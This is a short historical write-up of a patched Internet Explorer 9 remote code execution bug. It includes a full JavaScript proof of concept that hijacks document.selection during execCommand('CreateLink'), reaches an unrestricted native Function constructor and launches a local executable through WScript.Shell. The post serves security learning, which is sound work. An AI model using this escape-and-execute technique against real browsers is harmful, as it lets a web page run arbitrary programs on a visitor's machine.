IE9 RCE: Intercepting Internal Dialogs via Object.defineProperty

By intercepting a property access that IE’s own internal code triggered during a document.execCommand call, and using arguments.callee.caller.constructor to obtain the native Function constructor, it was possible to execute arbitrary script — including launching local executables. This technique was built on a foundation discovered by Gareth Heyes (WOOBR #1122102).

Object.defineProperty(document, "selection", {
    get: function() {
        var dialogFunction = arguments.callee.caller.constructor;
        dialogFunction(
            '(new ActiveXObject("WScript.Shell"))' +
            '.Run("file:///c:/windows/system32/notepad.exe", 1, true);'
        )();
    }
});
document.execCommand("CreateLink");

When CreateLink ran, IE internally accessed document.selection. The getter fired in IE’s own calling context, and arguments.callee.caller.constructor resolved to the engine’s native Function constructor, which did not have the security restrictions applied to the web page’s own Function. The resulting function ran with elevated privileges, allowing local process execution.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.